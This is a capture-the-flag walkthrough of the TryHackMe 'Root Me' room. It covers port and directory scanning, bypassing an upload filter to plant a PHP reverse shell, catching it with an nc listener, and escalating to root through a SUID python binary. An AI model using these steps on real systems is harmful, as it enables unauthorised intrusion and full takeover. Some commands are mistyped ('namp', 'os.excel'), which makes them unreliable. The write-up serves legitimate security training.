Try Hack Me Writeup (Root Me)
Hi, before I jump into the writeup giving you the disclaimer that my machine IP is changed in different screenshots it's due to the fact that I have done with the tasks first and then took these shots by activating multiple machines just for the purpose of writing its writeup.
Task 1 (Deploy the machine):
This is a very easy task to do just connect the VPN with your VM and click on start machine.
Task 2(Reconnaissance):
From here the actual activity begins, as you got the machine IP now its time to scan all the ports open on that IP for this you have to use the Nmap built-in tool in Kali Linux. Open the terminal and run the command namp -Pn (machine IP)
now you can see all open ports and services running on it.
Now it is time to run the second command nmap -sV (machine IP)
this shows which version of services are running on the open port.
Now it is time to find the hidden directories on IP for this install gobuster, I am not going into that as it's out of scope so as I have gobuster now type the command gobuster dir -u (machine IP) -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt this would brute force the name of the hidden dir so be patient it might take time.
This would let us know about all the hidden dir on the IP. So, as all the challenges of this task are fulfilled now, fill in the answers.
So, the task 2 is now completed successfully.
Task 3(Getting the Shell):
Open the dir on the web
This window would be opened.
As the hint is given that we have to do the PHP reverse shell, try to upload the PHP file, The PHP reverse shell file is given already go to this dir use this file, and upload it.
Oh, it's not uploading so we have to try another extension. So, rename it to phtml.
Now, open the file with gedit and replace this IP with your local VPN IP.
Now upload this file and you can see its successful.
Now, open a new terminal or navigate to root dir and type command nc -lnvp 1234 this will listen to port 1234 after that click and open the file after navigating to /uploads directory. As you click on the file it you start communicating with port 1234.
Now you can see the connection is established but it's not stable now type python -c ‘import pty;pty.spawn(“/bin/bash”)’
WE ARE IN NOW I REPEAT WE ARE IN ; )
Recommended by LinkedIn
Now simply navigate through directories and user.txt has our flag. Task 3 is now successfully completed.
Task 4(Privilege Escalation):
Open the hint of the first task and enter in this bash terminal command is find / -user root -perm /4000 here we match the flag format with all obtained outputs and also look for the suspicious this /python is found here.
It’s the correct flag.
Now to gain root privileges type: python -c ‘import os; os.excel(“/bin/sh”, “sh”, “-p”)’ you can get this command by exploring gtfobins.
You are the ROOT now
cat the root.txt file and you will get the flag.
disclaimer: these images are added in sequential order even now if you have any concerns see the original blog at: https://medium.com/@i221666/thm-rootme-challenge-writeup-33b2f88d1af1 else contact me.